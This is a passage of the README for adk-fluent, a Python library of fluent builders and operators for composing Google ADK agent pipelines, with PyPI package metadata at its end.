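
```python
def pick(*keys):
    # Keep only the listed keys
    return lambda s: {k: s[k] for k in keys if k in s}

def rename(**kw):
    # kw maps old_key -> new_key
    return lambda s: {kw.get(k, k): v for k, v in s.items()}

def merge(*keys, into, sep="\n"):
    # Combine several keys into one joined value
    return lambda s: {**s, into: sep.join(str(s[k]) for k in keys if k in s)}

state = {"web": "W", "scholar": "S", "noise": 1}
state = merge("web", "scholar", into="research")(state)
state = pick("research")(state)
state = rename(research="input")(state)
print(state)  # {'input': 'W\nS'}
```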
### IR, Backends, and Middleware (v4)
Builders can compile to an intermediate representation (IR) for inspection, testing, and alternative backends:
```python
from adk_fluent import Agent, ExecutionConfig, CompactionConfig
# IR: inspect the agent tree without building
pipeline = Agent("a") >> Agent("b") >> Agent("c")
ir = pipeline.to_ir() # Returns frozen dataclass tree
# to_app(): compile through IR to a native ADK App
app = pipeline.to_app(config=ExecutionConfig(
app_name="my_app",
resumable=True,
compaction=CompactionConfig(interval=10),
))
# Middleware: app-global cross-cutting behavior
from adk_fluent import Middleware, RetryMiddleware, StructuredLogMiddleware
app = (
Agent("a") >> Agent("b")
).middleware(RetryMiddleware(max_retries=3)).to_app()
# Data contracts: verify pipeline wiring at build time
from pydantic import BaseModel
from adk_fluent.testing import check_contracts
class Intent(BaseModel):
category: str
confidence: float
pipeline = Agent("classifier").produces(Intent) >> Agent("resolver").consumes(Intent)
issues = check_contracts(pipeline.to_ir()) # [] = all good
# Deterministic testing without LLM calls
from adk_fluent.testing import mock_backend, AgentHarness
harness = AgentHarness(pipeline, backend=mock_backend({
"classifier": {"category": "billing", "confidence": 0.9},
"resolver": "Ticket #1234 created.",
}))
# Graph visualization
print(pipeline.to_mermaid()) # Mermaid diagram source
```
```python
# Tool confirmation (human-in-the-loop approval)
agent = Agent("ops").tool(deploy_fn, require_confirmation=True)
# Resource DI (hide infra params from LLM)
agent = Agent("lookup").tool(search_db).inject(db=my_database)
```
### Deterministic Routing
Route on session state without LLM calls:
```python
from adk_fluent import Agent
from adk_fluent._routing import Route
classifier = Agent("classify").model("gemini-2.5-flash").instruct("Classify intent.").outputs("intent")
booker = Agent("booker").model("gemini-2.5-flash").instruct("Book flights.")
info = Agent("info").model("gemini-2.5-flash").instruct("Provide info.")
# Route on exact match — zero LLM calls for routing
pipeline = classifier >> Route("intent").eq("booking", booker).eq("info", info)
# Dict shorthand
pipeline = classifier >> {"booking": booker, "info": info}
```
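Deterministic routing reduces to a dict lookup on a state value. A sketch of that idea with plain strings standing in for agents (not the `Route` implementation itself):

```python
def route(key, table, default=None):
    # Hypothetical deterministic router: pick the next agent by exact match
    # on a session-state value -- zero LLM calls involved.
    def choose(state):
        return table.get(state.get(key), default)
    return choose

choose = route("intent", {"booking": "booker", "info": "info_agent"})
print(choose({"intent": "booking"}))  # booker
print(choose({"intent": "unknown"}))  # None (no default configured)
```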
### Conditional Gating
```python
# Only runs if predicate(state) is truthy
enricher = (
Agent("enricher")
.model("gemini-2.5-flash")
.instruct("Enrich the data.")
.proceed_if(lambda s: s.get("valid") == "yes")
)
```
### Tap (Observe Without Mutating)
`tap(fn)` creates a zero-cost observation step. It reads state but never writes back -- perfect for logging, metrics, and debugging:
```python
from adk_fluent import tap
pipeline = (
writer
>> tap(lambda s: print("Draft:", s.get("draft", "")[:50]))
>> reviewer
)
# Also available as a method
pipeline = writer.tap(lambda s: log_metrics(s)) >> reviewer
```
### Expect (State Assertions)
`expect(pred, msg)` asserts a state contract at a pipeline step. Raises `ValueError` if the predicate fails:
```python
from adk_fluent import expect
pipeline = (
writer
>> expect(lambda s: "draft" in s, "Writer must produce a draft")
>> reviewer
)
```
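`expect` can be pictured as a zero-cost step that checks the predicate and raises. A sketch of the described contract, not the library internals:

```python
def expect_step(pred, msg):
    # Hypothetical pipeline step: pass state through untouched when the
    # contract holds, raise ValueError when it does not.
    def step(state):
        if not pred(state):
            raise ValueError(msg)
        return state
    return step

check = expect_step(lambda s: "draft" in s, "Writer must produce a draft")
assert check({"draft": "v1"}) == {"draft": "v1"}  # passes through unchanged
try:
    check({})
except ValueError as e:
    print(e)  # Writer must produce a draft
```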
### Mock (Testing Without LLM)
`.mock(responses)` bypasses LLM calls with canned responses. Uses the same `before_model_callback` mechanism as ADK's `ReplayPlugin`, but scoped to a single agent:
```python
# List of responses (cycles when exhausted)
agent = Agent("writer").model("gemini-2.5-flash").instruct("Write.").mock(["Draft 1", "Draft 2"])
# Callable for dynamic mocking
agent = Agent("echo").model("gemini-2.5-flash").mock(lambda req: "Mocked response")
```
### Retry If
`.retry_if(pred)` retries agent execution while the predicate returns True. Thin wrapper over `loop_until` with inverted logic:
```python
agent = (
Agent("writer").model("gemini-2.5-flash")
.instruct("Write a high-quality draft.").outputs("quality")
.retry_if(lambda s: s.get("quality") != "good", max_retries=3)
)
```
### Map Over
`map_over(key, agent)` iterates an agent over each item in a state list:
```python
from adk_fluent import map_over
pipeline = (
fetcher
>> map_over("documents", summarizer, output_key="summaries")
>> compiler
)
```
### Timeout
`.timeout(seconds)` wraps an agent with a time limit. Raises `asyncio.TimeoutError` if exceeded:
```python
agent = Agent("researcher").model("gemini-2.5-pro").instruct("Deep research.").timeout(60)
```
### Gate (Human-in-the-Loop)
`gate(pred, msg)` pauses the pipeline for human approval when the condition is met. Uses ADK's `escalate` mechanism:
```python
from adk_fluent import gate
pipeline = (
analyzer
>> gate(lambda s: s.get("risk") == "high", message="Approve high-risk action?")
>> executor
)
```
### Race (First-to-Finish)
`race(a, b, ...)` runs agents concurrently and keeps only the first to finish:
```python
from adk_fluent import race
winner = race(
Agent("fast").model("gemini-2.0-flash").instruct("Quick answer."),
Agent("thorough").model("gemini-2.5-pro").instruct("Detailed answer."),
)
```
### Full Composition
All operators compose into a single expression:
```python
from pydantic import BaseModel
from adk_fluent import Agent, S, until
class Report(BaseModel):
title: str
body: str
confidence: float
pipeline = (
( Agent("web").model("gemini-2.5-flash").instruct("Search web.")
| Agent("scholar").model("gemini-2.5-flash").instruct("Search papers.")
)
>> S.merge("web", "scholar", into="research")
>> Agent("writer").model("gemini-2.5-flash").instruct("Write.") @ Report
// Agent("writer_b").model("gemini-2.5-pro").instruct("Write.") @ Report
>> (
Agent("critic").model("gemini-2.5-flash").instruct("Score.").outputs("confidence")
>> Agent("reviser").model("gemini-2.5-flash").instruct("Improve.")
) * until(lambda s: s.get("confidence", 0) >= 0.85, max=4)
)
```
## Fluent API Reference
### Agent Builder
The `Agent` builder wraps ADK's `LlmAgent`. Every method returns `self` for chaining.
#### Core Configuration
| Method | Alias for | Description |
|--------|-----------|-------------|
| `.model(name)` | `model` | LLM model identifier (`"gemini-2.5-flash"`, `"gemini-2.5-pro"`, etc.) |
| `.instruct(text_or_fn)` | `instruction` | System instruction. Accepts a string or `Callable[[ReadonlyContext], str]` |
| `.describe(text)` | `description` | Agent description (used in delegation and tool descriptions) |
| `.outputs(key)` | `output_key` | Store the agent's final response in session state under this key |
| `.tool(fn)` | — | Add a tool function or `BaseTool` instance. Multiple calls accumulate |
| `.build()` | — | Resolve into a native ADK `LlmAgent` |
#### Prompt & Context Control
| Method | Alias for | Description |
|--------|-----------|-------------|
| `.instruct(text)` | `instruction` | Dynamic instruction. Supports `{variable}` placeholders auto-resolved from session state |
| `.instruct(fn)` | `instruction` | Callable receiving `ReadonlyContext`, returns string. Full programmatic control |
| `.static(content)` | `static_instruction` | Cacheable instruction that never changes. Sent as system instruction for context caching |
| `.history("none")` | `include_contents` | Control conversation history: `"default"` (full history) or `"none"` (stateless) |
| `.global_instruct(text)` | `global_instruction` | Instruction inherited by all sub-agents |
| `.inject_context(fn)` | — | Prepend dynamic context via `before_model_callback`. The function receives callback context, returns a string |
Template variables in string instructions are auto-resolved from session state:
```python
# {topic} and {style} are replaced at runtime from session state
agent = Agent("writer").instruct("Write about {topic} in a {style} tone.")
```
This composes naturally with the expression algebra:
```python
pipeline = (
Agent("classifier").instruct("Classify.").outputs("topic")
>> S.default(style="professional")
>> Agent("writer").instruct("Write about {topic} in a {style} tone.")
)
```
Optional variables use `?` suffix (`{maybe_key?}` returns empty string if missing). Namespaced keys: `{app:setting}`, `{user:pref}`, `{temp:scratch}`.
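The resolution rule can be sketched with a small regex substitution (an illustration of the behavior described above, not the library's resolver; namespaced keys are treated here as plain prefixed state entries):

```python
import re

def resolve(template, state):
    # Hypothetical resolver: "{key}" must exist in state; "{key?}" falls
    # back to "" when missing.
    def sub(m):
        key, optional = m.group(1), m.group(2) == "?"
        if key in state:
            return str(state[key])
        if optional:
            return ""
        raise KeyError(f"missing state key: {key}")
    return re.sub(r"\{([\w:]+)(\??)\}", sub, template)

print(resolve("Write about {topic} in a {style?} tone.", {"topic": "whales"}))
# Write about whales in a  tone.
```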
#### Prompt Builder
For multi-section prompts, the `Prompt` builder provides structured composition:
```python
from adk_fluent import Prompt
prompt = (
Prompt()
.role("You are a senior code reviewer.")
.context("The codebase uses Python 3.11 with type hints.")
.task("Review the code for bugs and security issues.")
.constraint("Be concise. Max 5 bullet points.")
.constraint("No false positives.")
.format("Return markdown with ## sections.")
.example("Input: x=eval(input()) | Output: - **Critical**: eval() on user input")
)
agent = Agent("reviewer").model("gemini-2.5-flash").instruct(prompt).build()
```
Sections are emitted in a fixed order (role, context, task, constraints, format, examples) regardless of call order. Prompts are composable and reusable:
```python
base_prompt = Prompt().role("You are a senior engineer.").constraint("Be precise.")
reviewer = Agent("reviewer").instruct(base_prompt + Prompt().task("Review code."))
writer = Agent("writer").instruct(base_prompt + Prompt().task("Write documentation."))
```
| Method | Description |
|--------|-------------|
| `.role(text)` | Agent persona (emitted without header) |
| `.context(text)` | Background information |
| `.task(text)` | Primary objective |
| `.constraint(text)` | Rules to follow (multiple calls accumulate) |
| `.format(text)` | Desired output format |
| `.example(text)` | Few-shot examples (multiple calls accumulate) |
| `.section(name, text)` | Custom named section |
| `.merge(other)` / `+` | Combine two Prompts |
| `.build()` / `str()` | Compile to instruction string |
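The fixed-order guarantee can be modeled by accumulating sections under their kind and emitting them in a canonical sequence at build time. A sketch under that assumption (`SketchPrompt` is hypothetical, not the shipped `Prompt`):

```python
_ORDER = ("role", "context", "task", "constraint", "format", "example")

class SketchPrompt:
    # Hypothetical mini-Prompt: sections accumulate in any call order,
    # but build() always emits them in the canonical _ORDER.
    def __init__(self):
        self.sections = {k: [] for k in _ORDER}

    def add(self, kind, text):
        self.sections[kind].append(text)
        return self

    def build(self):
        lines = []
        for kind in _ORDER:
            lines.extend(self.sections[kind])
        return "\n".join(lines)

p = SketchPrompt().add("task", "Review code.").add("role", "You are a reviewer.")
print(p.build())
# You are a reviewer.
# Review code.
```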
#### Static Instructions & Context Caching
Split prompts into cacheable and dynamic parts:
```python
agent = (
Agent("analyst")
.model("gemini-2.5-flash")
.static("You are a financial analyst. Here is the 50-page annual report: ...")
.instruct("Answer the user's question about the report.")
.build()
)
```
When `.static()` is set, the static content is sent as the system instruction (eligible for context caching), while `.instruct()` content is sent as user content. This avoids re-processing large static contexts on every turn.
#### Dynamic Context Injection
Prepend runtime context to every LLM call:
```python
agent = (
Agent("support")
.model("gemini-2.5-flash")
.instruct("Help the customer.")
.inject_context(lambda ctx: f"Customer: {ctx.state.get('customer_name', 'unknown')}")
.inject_context(lambda ctx: f"Plan: {ctx.state.get('plan', 'free')}")
)
```
Each `.inject_context()` call accumulates. The function receives the callback context and returns a string that gets prepended as content before the LLM processes the request.
#### Callbacks
All callback methods are **additive** -- multiple calls accumulate handlers, never replace:
| Method | Alias for | Description |
|--------|-----------|-------------|
| `.before_model(fn)` | `before_model_callback` | Runs before each LLM call. Receives `(callback_context, llm_request)` |
| `.after_model(fn)` | `after_model_callback` | Runs after each LLM call. Receives `(callback_context, llm_response)` |
| `.before_agent(fn)` | `before_agent_callback` | Runs before agent execution |
| `.after_agent(fn)` | `after_agent_callback` | Runs after agent execution |
| `.before_tool(fn)` | `before_tool_callback` | Runs before each tool call |
| `.after_tool(fn)` | `after_tool_callback` | Runs after each tool call |
| `.on_model_error(fn)` | `on_model_error_callback` | Handles LLM errors |
| `.on_tool_error(fn)` | `on_tool_error_callback` | Handles tool errors |
| `.guardrail(fn)` | — | Registers `fn` as both `before_model` and `after_model` |
Conditional variants append only when the condition is true:
```python
agent = (
Agent("service")
.before_model_if(debug_mode, log_fn)
.after_model_if(audit_enabled, audit_fn)
)
```
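Additive accumulation can be pictured as each setter appending to a per-callback list instead of overwriting a slot. A minimal sketch, not the generated builder code:

```python
class SketchBuilder:
    # Hypothetical builder fragment: callbacks accumulate, never replace.
    def __init__(self):
        self.before_model_callbacks = []

    def before_model(self, fn):
        self.before_model_callbacks.append(fn)  # append, don't overwrite
        return self

    def before_model_if(self, cond, fn):
        # Conditional variant: append only when the condition is true
        if cond:
            self.before_model_callbacks.append(fn)
        return self

b = SketchBuilder().before_model(print).before_model_if(False, id).before_model(len)
print(len(b.before_model_callbacks))  # 2
```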
#### Control Flow
| Method | Description |
|--------|-------------|
| `.proceed_if(pred)` | Only run this agent if `pred(state)` is truthy. Uses `before_agent_callback` |
| `.loop_until(pred, max_iterations=N)` | Wrap in a loop that exits when `pred(state)` is satisfied |
| `.retry_if(pred, max_retries=3)` | Retry while `pred(state)` returns True. Inverse of `loop_until` |
| `.mock(responses)` | Bypass LLM with canned responses (list or callable). For testing |
| `.tap(fn)` | Append observation step: `self >> tap(fn)`. Returns Pipeline |
| `.timeout(seconds)` | Wrap with time limit. Raises `asyncio.TimeoutError` on expiry |
#### Delegation (LLM-Driven Routing)
```python
# The coordinator's LLM decides when to delegate
coordinator = (
Agent("coordinator")
.model("gemini-2.5-flash")
.instruct("Route tasks to the right specialist.")
.delegate(Agent("math").model("gemini-2.5-flash").instruct("Solve math."))
.delegate(Agent("code").model("gemini-2.5-flash").instruct("Write code."))
.build()
)
```
`.delegate(agent)` wraps the sub-agent in an `AgentTool` so the coordinator's LLM can invoke it by name.
#### One-Shot Execution
| Method | Description |
|--------|-------------|
| `.ask(prompt)` | Send a prompt, get response text. No Runner/Session boilerplate |
| `.ask_async(prompt)` | Async version of `.ask()` |
| `.stream(prompt)` | Async generator yielding response text chunks |
| `.events(prompt)` | Async generator yielding raw ADK `Event` objects |
| `.map(prompts, concurrency=5)` | Batch execution against multiple prompts |
| `.map_async(prompts, concurrency=5)` | Async batch execution |
| `.session()` | Create an interactive `async with` session context manager |
| `.test(prompt, contains=, matches=, equals=)` | Smoke test: calls `.ask()` and asserts output |
#### Cloning and Variants
```python
base = Agent("base").model("gemini-2.5-flash").instruct("Be helpful.")
# Clone — independent deep copy with new name
math_agent = base.clone("math").instruct("Solve math.")
# with_() — immutable variant (original unchanged)
creative = base.with_(name="creative", model="gemini-2.5-pro")
```
#### Validation and Introspection
| Method | Description |
|--------|-------------|
| `.validate()` | Try `.build()` and raise `ValueError` with clear message on failure. Returns `self` |
| `.explain()` | Multi-line summary of builder state (config fields, callbacks, lists) |
| `.to_dict()` / `.to_yaml()` | Serialize builder state (inspection only, no round-trip) |
#### Dynamic Field Forwarding
Any ADK `LlmAgent` field can be set through `__getattr__`, even without an explicit method:
```python
agent = Agent("x").generate_content_config(my_config) # Works via forwarding
```
Misspelled names raise `AttributeError` with the closest match suggestion.
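Forwarding plus typo suggestions can be built from `__getattr__` and `difflib.get_close_matches`. A sketch of the described behavior (`SketchAgent` and its `_FIELDS` set are hypothetical, not the package source):

```python
import difflib

class SketchAgent:
    # Hypothetical forwarding builder: any known field name becomes a
    # chainable setter; unknown names raise with a close-match suggestion.
    _FIELDS = {"model", "instruction", "description", "output_key"}

    def __init__(self):
        self.config = {}

    def __getattr__(self, name):
        # Only called when normal attribute lookup fails
        if name not in self._FIELDS:
            hint = difflib.get_close_matches(name, self._FIELDS, n=1)
            suffix = f" Did you mean: '{hint[0]}'?" if hint else ""
            raise AttributeError(f"'{name}' is not a recognized field.{suffix}")
        def setter(value):
            self.config[name] = value
            return self
        return setter

a = SketchAgent()
a.model("gemini-2.5-flash").instruction("Help.")
try:
    a.instuction("oops")
except AttributeError as e:
    print(e)  # 'instuction' is not a recognized field. Did you mean: 'instruction'?
```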
### Workflow Builders
All workflow builders accept both built ADK agents and fluent builders as arguments. Builders are auto-built at `.build()` time, enabling safe sub-expression reuse.
#### Pipeline (Sequential)
```python
from adk_fluent import Pipeline, Agent
# Builder style — full control over each step
pipeline = (
Pipeline("data_processing")
.step(Agent("extractor", "gemini-2.5-flash").instruct("Extract entities.").outputs("entities"))
.step(Agent("enricher", "gemini-2.5-flash").instruct("Enrich {entities}.").tool(lookup_db))
.step(Agent("formatter", "gemini-2.5-flash").instruct("Format output.").history("none"))
.build()
)
# Operator style — same result
pipeline = (
Agent("extractor", "gemini-2.5-flash").instruct("Extract entities.").outputs("entities")
>> Agent("enricher", "gemini-2.5-flash").instruct("Enrich {entities}.").tool(lookup_db)
>> Agent("formatter", "gemini-2.5-flash").instruct("Format output.").history("none")
).build()
```
| Method | Description |
|--------|-------------|
| `.step(agent)` | Append an agent as the next step. Lazy -- built at `.build()` time |
| `.build()` | Resolve into a native ADK `SequentialAgent` |
#### FanOut (Parallel)
```python
from adk_fluent import FanOut, Agent
# Builder style — named branches with different models
fanout = (
FanOut("research")
.branch(Agent("web", "gemini-2.5-flash").instruct("Search the web.").outputs("web_results"))
.branch(Agent("papers", "gemini-2.5-pro").instruct("Search academic papers.").outputs("paper_results"))
.branch(Agent("internal", "gemini-2.5-flash").instruct("Search internal docs.").outputs("internal_results"))
.build()
)
# Operator style
fanout = (
Agent("web", "gemini-2.5-flash").instruct("Search web.").outputs("web_results")
| Agent("papers", "gemini-2.5-pro").instruct("Search papers.").outputs("paper_results")
| Agent("internal", "gemini-2.5-flash").instruct("Search internal docs.").outputs("internal_results")
).build()
```
| Method | Description |
|--------|-------------|
| `.branch(agent)` | Add a parallel branch agent. Lazy -- built at `.build()` time |
| `.build()` | Resolve into a native ADK `ParallelAgent` |
#### Loop
```python
from adk_fluent import Loop, Agent, until
# Builder style — explicit loop configuration
loop = (
Loop("quality_loop")
.step(Agent("writer", "gemini-2.5-flash").instruct("Write draft.").outputs("quality"))
.step(Agent("reviewer", "gemini-2.5-flash").instruct("Review and score."))
.max_iterations(5)
.until(lambda s: s.get("quality") == "good")
.build()
)
# Operator style
loop = (
Agent("writer", "gemini-2.5-flash").instruct("Write draft.").outputs("quality")
>> Agent("reviewer", "gemini-2.5-flash").instruct("Review and score.")
) * until(lambda s: s.get("quality") == "good", max=5)
```
| Method | Description |
|--------|-------------|
| `.step(agent)` | Append a step agent. Lazy -- built at `.build()` time |
| `.max_iterations(n)` | Set maximum loop iterations |
| `.until(pred)` | Set exit predicate. Exits when `pred(state)` is truthy |
| `.build()` | Resolve into a native ADK `LoopAgent` |
#### Combining Builder and Operator Styles
The styles mix freely. Use builders for complex individual steps and operators for composition:
```python
from adk_fluent import Agent, Pipeline, FanOut, S, until, Prompt
# Define reusable agents with full builder configuration
researcher = (
Agent("researcher", "gemini-2.5-flash")
.instruct(Prompt().role("You are a research analyst.").task("Find relevant information."))
.tool(search_tool)
.before_model(log_fn)
.outputs("findings")
)
writer = (
Agent("writer", "gemini-2.5-pro")
.instruct("Write a report about {findings}.")
.static("Company style guide: use formal tone, cite sources...")
.outputs("draft")
)
reviewer = (
Agent("reviewer", "gemini-2.5-flash")
.instruct("Score the draft 1-10 for quality.")
.outputs("quality_score")
)
# Compose with operators — each sub-expression is reusable
research_phase = (
FanOut("gather")
.branch(researcher.clone("web").tool(web_search))
.branch(researcher.clone("papers").tool(paper_search))
)
pipeline = (
research_phase
>> S.merge("web", "papers", into="findings")
>> writer
>> (reviewer >> writer) * until(lambda s: int(s.get("quality_score", 0)) >= 8, max=3)
)
```
### Presets
Reusable configuration bundles:
```python
from adk_fluent.presets import Preset
production = Preset(model="gemini-2.5-flash", before_model=log_fn, after_model=audit_fn)
agent = Agent("service").instruct("Handle requests.").use(production).build()
```
### @agent Decorator
```python
from adk_fluent.decorators import agent
@agent("weather_bot", model="gemini-2.5-flash")
def weather_bot():
"""You help with weather queries."""
@weather_bot.tool
def get_weather(city: str) -> str:
return f"Sunny in {city}"
built = weather_bot.build()
```
### Typed State Keys
```python
from adk_fluent import StateKey
call_count = StateKey("call_count", scope="session", type=int, default=0)
# In callbacks/tools:
current = call_count.get(ctx)
call_count.increment(ctx)
```
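A typed state key can be sketched as a small wrapper carrying a name, a type, and a default over a dict standing in for session state (an illustration; the real `StateKey` works against ADK context objects and scopes):

```python
class SketchStateKey:
    # Hypothetical typed key over a plain dict acting as session state.
    def __init__(self, name, type=int, default=0):
        self.name, self.type, self.default = name, type, default

    def get(self, state):
        return state.get(self.name, self.default)

    def set(self, state, value):
        if not isinstance(value, self.type):
            raise TypeError(f"{self.name} expects {self.type.__name__}")
        state[self.name] = value

    def increment(self, state, by=1):
        self.set(state, self.get(state) + by)

call_count = SketchStateKey("call_count", type=int, default=0)
state = {}
call_count.increment(state)
call_count.increment(state)
print(call_count.get(state))  # 2
```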
## Run with `adk web`
### Environment Setup
Before running any example, copy the `.env.example` and fill in your Google Cloud credentials:
```bash
cd examples
cp .env.example .env
# Edit .env with your values:
# GOOGLE_CLOUD_PROJECT=your-project-id
# GOOGLE_CLOUD_LOCATION=us-central1
# GOOGLE_GENAI_USE_VERTEXAI=TRUE
```
Every agent loads these variables automatically via `load_dotenv()`.
### Run an Example
```bash
cd examples
adk web simple_agent # Basic agent
adk web weather_agent # Agent with tools
adk web research_team # Multi-agent pipeline
adk web real_world_pipeline # Full expression language
adk web route_branching # Deterministic routing
adk web delegate_pattern # LLM-driven delegation
adk web operator_composition # >> | * operators
adk web function_steps # >> fn (function nodes)
adk web until_operator # * until(pred)
adk web typed_output # @ Schema
adk web fallback_operator # // fallback
adk web state_transforms # S.pick, S.rename, ...
adk web full_algebra # All operators together
adk web tap_observation # tap() observation steps
adk web mock_testing # .mock() for testing
adk web race # race() first-to-finish
```
43 runnable examples covering all features. See [`examples/`](examples/) for the full list.
## Cookbook
42 annotated examples in [`examples/cookbook/`](examples/cookbook/) with side-by-side Native ADK vs Fluent comparisons. Each file is also a runnable test:
```bash
pytest examples/cookbook/ -v
```
| # | Example | Feature |
|---|---------|---------|
| 01 | Simple Agent | Basic agent creation |
| 02 | Agent with Tools | Tool registration |
| 03 | Callbacks | Additive callback accumulation |
| 04 | Sequential Pipeline | Pipeline builder |
| 05 | Parallel FanOut | FanOut builder |
| 06 | Loop Agent | Loop builder |
| 07 | Team Coordinator | Sub-agent delegation |
| 08 | One-Shot Ask | `.ask()` execution |
| 09 | Streaming | `.stream()` execution |
| 10 | Cloning | `.clone()` deep copy |
| 11 | Inline Testing | `.test()` smoke tests |
| 12 | Guardrails | `.guardrail()` shorthand |
| 13 | Interactive Session | `.session()` context manager |
| 14 | Dynamic Forwarding | `__getattr__` field access |
| 15 | Production Runtime | Full agent setup |
| 16 | Operator Composition | `>>` `\|` `*` operators |
| 17 | Route Branching | Deterministic `Route` |
| 18 | Dict Routing | `>>` dict shorthand |
| 19 | Conditional Gating | `.proceed_if()` |
| 20 | Loop Until | `.loop_until()` |
| 21 | StateKey | Typed state descriptors |
| 22 | Presets | `Preset` + `.use()` |
| 23 | With Variants | `.with_()` immutable copy |
| 24 | @agent Decorator | Decorator syntax |
| 25 | Validate & Explain | `.validate()` `.explain()` |
| 26 | Serialization | `to_dict` / `to_yaml` |
| 27 | Delegate Pattern | `.delegate()` |
| 28 | Real-World Pipeline | Full composition |
| 29 | Function Steps | `>> fn` zero-cost transforms |
| 30 | Until Operator | `* until(pred)` conditional loops |
| 31 | Typed Output | `@ Schema` output contracts |
| 32 | Fallback Operator | `//` first-success chains |
| 33 | State Transforms | `S.pick`, `S.rename`, `S.merge`, ... |
| 34 | Full Algebra | All operators composed together |
| 35 | Tap Observation | `tap()` pure observation steps |
| 36 | Expect Assertions | `expect()` state contract checks |
| 37 | Mock Testing | `.mock()` bypass LLM for tests |
| 38 | Retry If | `.retry_if()` conditional retry |
| 39 | Map Over | `map_over()` iterate agent over list |
| 40 | Timeout | `.timeout()` time-bound execution |
| 41 | Gate Approval | `gate()` human-in-the-loop |
| 42 | Race | `race()` first-to-finish wins |
## How It Works
adk-fluent is **auto-generated** from the installed ADK package:
```
scanner.py ──> manifest.json ──> seed_generator.py ──> seed.toml ──> generator.py ──> Python code
^
seed.manual.toml
(hand-crafted extras)
```
1. **Scanner** introspects all ADK modules and produces `manifest.json`
2. **Seed Generator** classifies classes and produces `seed.toml` (merged with manual extras)
3. **Code Generator** emits fluent builders, `.pyi` type stubs, and test scaffolds
This means adk-fluent automatically stays in sync with ADK updates:
```bash
pip install --upgrade google-adk
just all # Regenerate everything
just test # Verify
```
## API Reference
Generated API docs are in [`docs/generated/api/`](docs/generated/api/):
- [`agent.md`](docs/generated/api/agent.md) -- Agent, BaseAgent builders
- [`workflow.md`](docs/generated/api/workflow.md) -- Pipeline, FanOut, Loop
- [`tool.md`](docs/generated/api/tool.md) -- 40+ tool builders
- [`service.md`](docs/generated/api/service.md) -- Session, artifact, memory services
- [`config.md`](docs/generated/api/config.md) -- Configuration builders
- [`plugin.md`](docs/generated/api/plugin.md) -- Plugin builders
- [`runtime.md`](docs/generated/api/runtime.md) -- Runner, App builders
Migration guide: [`docs/generated/migration/from-native-adk.md`](docs/generated/migration/from-native-adk.md)
## Features
- **130+ builders** covering agents, tools, configs, services, plugins, planners, executors
- **Expression algebra**: `>>` (sequence), `|` (parallel), `*` (loop), `@` (typed output), `//` (fallback), `>> fn` (transforms), `S` (state ops), `Route` (branch)
- **Prompt builder**: structured multi-section prompt composition via `Prompt`
- **Template variables**: `{key}` in instructions auto-resolved from session state
- **Context control**: `.static()` for cacheable context, `.history("none")` for stateless agents, `.inject_context()` for dynamic preambles
- **State transforms**: `S.pick`, `S.drop`, `S.rename`, `S.default`, `S.merge`, `S.transform`, `S.compute`, `S.guard`
- **Full IDE autocomplete** via `.pyi` type stubs
- **Zero-maintenance** `__getattr__` forwarding for any ADK field
- **Callback accumulation**: multiple `.before_model()` calls append, not replace
- **Typo detection**: misspelled methods raise `AttributeError` with suggestions
- **Deterministic routing**: `Route` evaluates predicates against session state (zero LLM calls)
- **One-shot execution**: `.ask()`, `.stream()`, `.session()`, `.map()` without Runner boilerplate
- **Presets**: reusable config bundles via `Preset` + `.use()`
- **Cloning**: `.clone()` and `.with_()` for independent variants
- **Validation**: `.validate()` catches config errors at definition time
- **Serialization**: `to_dict()`, `to_yaml()`, `from_dict()`, `from_yaml()`
- **@agent decorator**: FastAPI-style agent definition
- **Typed state**: `StateKey` with scope, type, and default
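As an illustration of the dynamic-forwarding and typo-detection items above, the general pattern can be sketched with `__getattr__` plus `difflib` (a simplified sketch of the technique only; the class and field names here are invented, not adk-fluent's actual internals):

```python
import difflib

class FluentBuilder:
    """Minimal sketch: forward known fields, suggest fixes for typos."""
    _known = {"before_model", "after_model", "instruction", "model"}

    def __getattr__(self, name):
        if name in self._known:
            # In a real builder this would record the call and return self for chaining.
            return lambda *args, **kwargs: self
        hints = difflib.get_close_matches(name, self._known, n=1)
        hint = f" Did you mean '{hints[0]}'?" if hints else ""
        raise AttributeError(f"Unknown method '{name}'.{hint}")

b = FluentBuilder()
try:
    b.befor_model  # typo
except AttributeError as e:
    print(e)  # → Unknown method 'befor_model'. Did you mean 'before_model'?
```

The combination keeps the builder zero-maintenance (any new ADK field works immediately) while still failing loudly on misspellings.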
## Development
```bash
# Setup
uv venv .venv && source .venv/bin/activate
uv pip install google-adk pytest pyright
# Full pipeline: scan -> seed -> generate -> docs
just all
# Run tests (780+ tests)
just test
# Type check generated stubs
just typecheck
# Generate cookbook stubs for new builders
just cookbook-gen
# Convert cookbook to adk-web agent folders
just agents
```
## Publishing
Releases are published automatically to PyPI when a version tag is pushed:
```bash
# 1. Bump version in pyproject.toml
# 2. Commit and tag
git tag v0.2.0
git push origin v0.2.0
# 3. CI runs tests -> builds -> publishes to PyPI automatically
```
TestPyPI publishing is available manually via the GitLab CI web interface.
## License
MIT
| text/markdown | adk-fluent contributors | null | null | null | null | adk, agents, builder, fluent, google, llm | [
"Development Status :: 3 - Alpha",
"Framework :: Pydantic",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"Topic :: Software Development :: Libraries :: Python Modules",
"Typing :: Typed"
] | [] | null | null | >=3.11 | [] | [] | [] | [
"google-adk>=1.20.0",
"pre-commit>=3.0; extra == \"dev\"",
"pyright>=1.1; extra == \"dev\"",
"pytest-cov>=4.0; extra == \"dev\"",
"pytest>=7.0; extra == \"dev\"",
"ruff>=0.9; extra == \"dev\"",
"furo>=2024.0; extra == \"docs\"",
"myst-parser>=3.0; extra == \"docs\"",
"sphinx-copybutton>=0.5; extra == \"docs\"",
"sphinx-design>=0.6; extra == \"docs\"",
"sphinx>=7.0; extra == \"docs\"",
"python-dotenv>=1.0; extra == \"examples\"",
"pyyaml>=6.0; extra == \"yaml\""
] | [] | [] | [] | [
"Homepage, https://github.com/vamsiramakrishnan/adk-fluent",
"Repository, https://github.com/vamsiramakrishnan/adk-fluent",
"Issues, https://github.com/vamsiramakrishnan/adk-fluent/issues",
"Documentation, https://vamsiramakrishnan.github.io/adk-fluent/",
"Changelog, https://github.com/vamsiramakrishnan/adk-fluent/blob/master/CHANGELOG.md"
